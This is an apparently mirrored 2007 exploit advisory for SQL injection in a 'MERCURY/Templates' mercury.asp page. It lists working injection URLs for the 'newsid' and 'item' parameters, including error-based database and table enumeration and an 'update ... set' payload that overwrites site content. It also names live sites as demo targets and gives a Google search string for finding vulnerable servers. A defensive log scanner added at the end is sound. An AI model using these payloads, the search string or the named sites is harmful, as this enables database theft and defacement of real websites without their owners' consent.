Computer Security
[EN] securityvulns.ru

From:okan alp <codexploder_(at)_hotmail.com>
Date:10.07.2007
Subject:MERCURY/Templates mercury.ASP SQL Injection

MERCURY/Templates mercury.ASP SQL Injection

Credit : Code[Xp]Loder'tq

mail   : codexploder[at]hotmail[dot]com

site   : Biyosecurity.net,expw0rm.com

thx    : BiyoSecurityTeam

#####################################################

1-)  example.com/[patch]/mercury.asp?page_id=1&newsid=(sql method)

1-)  example.com/templates/mercury.asp?page_id=1&newsid=(sql method)

-------------------------------------------------------------

2-) example.com/[patch]/mercury.asp?page_id=2&item=(sql method)

2-) example.com/templates/mercury.asp?page_id=2&item=(sql method)

2-) example.com/templates/mercury.asp?page_id=2&item=1'

2-) example.com/templates/mercury.asp?page_id=2&item=1 having 1=1

2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,5

2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,5+update+tbl+set+column='your text or meta code';--

2-) example.com/templates/mercury.asp?page_id=2&item=1 group by tbl.column having 1=1

#for db : convert(int, db_name(1)
       
       : convert(int, db_name(2)

#for other tbl    : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))

#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))


#tbl    : V_news_LASTVERSION
#column : title,pictures,date,email,vs

##########################################################

demo site: http://www.pyxis-discovery.com/

google search code : inurl:"mercury.asp?page_id"

example site : http://www.radtech-europe.com
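
For defenders, a log check for the two parameters reported above (an added example, not part of the original advisory): it flags requests to mercury.asp whose `newsid` or `item` value is not a plain integer. The W3C-style field order, the sample log lines and the integer-only rule for legitimate ids are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs

# Parameters the advisory reports as injectable in mercury.asp.
WATCHED = ("newsid", "item")
# Assumption: a legitimate id is a short run of ASCII digits.
INT_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample, assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-07-10 10:00:01 192.0.2.10 GET /templates/mercury.asp page_id=1&newsid=42 200
2007-07-10 10:00:05 192.0.2.77 GET /templates/mercury.asp page_id=2&item=1' 500
2007-07-10 10:00:09 192.0.2.77 GET /templates/mercury.asp page_id=2&item=1+having+1=1 500
2007-07-10 10:00:12 192.0.2.10 GET /templates/index.asp item=abc 200
"""

def suspicious_params(stem, query):
    """Return {param: decoded value} for watched params that are not integers."""
    if not stem.lower().endswith("/mercury.asp"):
        return {}
    bad = {}
    # parse_qs decodes '+' and %xx, so encoded payloads are compared in clear.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in WATCHED:
            for value in values:
                if not INT_ID.fullmatch(value):
                    bad[name.lower()] = value
    return bad

def scan(log_text):
    """Return [(client_ip, findings)] for every request with a bad parameter."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip directives and short or malformed lines
        findings = suspicious_params(fields[4], fields[5])
        if findings:
            hits.append((fields[2], findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

The same integer-only test belongs in the page itself as input validation, with the id passed to the database as a typed query parameter rather than concatenated into the SQL string.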

© SecurityVulns, 3APA3A, Vladimir Dubrovin